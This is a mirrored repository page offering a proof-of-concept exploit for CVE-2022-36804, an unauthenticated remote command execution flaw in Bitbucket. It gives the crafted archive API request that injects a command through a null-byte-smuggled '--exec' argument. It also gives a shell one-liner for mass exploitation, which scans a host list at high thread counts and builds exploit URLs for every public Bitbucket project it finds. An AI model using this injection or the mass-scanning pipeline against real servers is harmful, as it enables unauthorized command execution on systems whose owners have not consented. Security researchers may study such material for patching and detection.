Giters

kljunowsky / CVE-2022-36804-POC

Bitbucket CVE-2022-36804 unauthenticated remote command execution

Home Page:https://shiftsecurityconsulting.com/

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

atlassianatlassian-bitbucketbitbucketbug-bountycve-2022-36804exploithackhackinginfosecpenetration-testingpenetration-testing-toolspocrcesecurity

CVE-2022-36804-POC 🕷️

Bitbucket CVE-2022-36804 unauthenticated remote command execution

Exploitation

Find publicly visible repositories - example.com/repos?visibility=public

/rest/api/latest/projects/{project-path}/archive?filename=kiE0h&at=kiE0h&path=kiE0h&prefix=ax%00--exec=%60id%60%00--remote=origin

Mass Exploitation

for url in $(cat hosts.txt | httpx -follow-redirects -title -path /repos?visibility=public -match-string "repository-container" -threads 9500 | grep Bitbucket |awk '{print $1}');do echo $url|sed 's/\/repos?visibility=public//g'|tr -d \\n;curl -s -k "$url" | grep -Po '(/projects/)(?!.*\1).*'|grep -o "/projects/.*/browse"|sed 's/browse//g'|awk '{print "/rest/api/latest"$1"archive?filename=kiE0h&at=kiE0h&path=kiE0h&prefix=ax%00--exec=%60id%60%00--remote=origin"}';done

Visit crafted URLs :)

Happy hunting! 🐺

Twitter

LinkedIn

About

Bitbucket CVE-2022-36804 unauthenticated remote command execution

https://shiftsecurityconsulting.com/

atlassianatlassian-bitbucketbitbucketbug-bountycve-2022-36804exploithackhackinginfosecpenetration-testingpenetration-testing-toolspocrcesecurity

License:MIT License

Languages

Language:Python 100.0%